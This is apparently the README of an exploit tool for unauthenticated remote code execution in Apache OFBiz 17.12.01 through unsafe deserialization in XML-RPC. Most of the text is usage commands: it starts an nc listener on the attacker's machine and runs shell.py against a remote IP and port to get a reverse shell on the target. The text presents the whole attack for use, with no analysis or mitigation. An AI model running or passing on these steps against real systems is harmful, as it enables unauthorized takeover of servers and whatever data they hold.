
ApacheOfBiz 17.12.01 - Unauthorized Remote Code Executión
ApacheOfBiz 17.12.01 - Unauthorized Remote Code Executión
XML-RPC request are vulnerable to unsafe deserialization.
pip3 install -r requeriments.txt
nc -nlvp <port> # attack computer
python3 shell.py -i <remote IP> -p <remote port> -li <local IP> -lp <local port>
You should have a shell in your nc listener
